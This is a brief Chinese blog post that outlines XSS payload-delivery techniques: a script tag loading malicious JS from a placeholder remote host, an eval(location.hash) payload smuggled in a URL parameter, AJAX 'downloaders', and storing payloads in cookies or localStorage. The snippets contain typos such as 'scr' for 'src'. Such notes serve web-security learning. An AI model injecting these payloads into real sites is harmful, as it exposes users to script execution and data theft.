xss中shellcode的调用

shellcode就是利用漏洞所执行的代码

在完整的xss攻击之中,会将shellcode存放在一定的地方,然后触发漏洞,引发shellcode.

1.远程调用执行js

可将js代码单独放在一个js文件中,然后通过http协议远程加载该脚本。

如<script scr=“http://xxx.xxx.xxx.xx/xx/xss.js”></script>

xss.js中内容可为任意js恶意代码

2.windows.location.hash

使用js中的windows.location.hash方式获取浏览器url地址栏的xss代码

其方法为会自动获取url中#后的内容

如构造?submit=submit&xsscode=<script>eval(location.hash.substr(1))</script>#alert(/xss/)

3.xss Downloader

xss下载器就是将xss代码写到网页中,然后通过AJAX技术,获取 网页中xss代码

4.备选存储技术

可以将shellcode存储在客户端的本地域中,比如Http Cookie ,Flash共享对象,UserDate,localStroge等

 

posted @ 2020-08-18 16:47  LY2333  阅读(312)  评论(0编辑  收藏  举报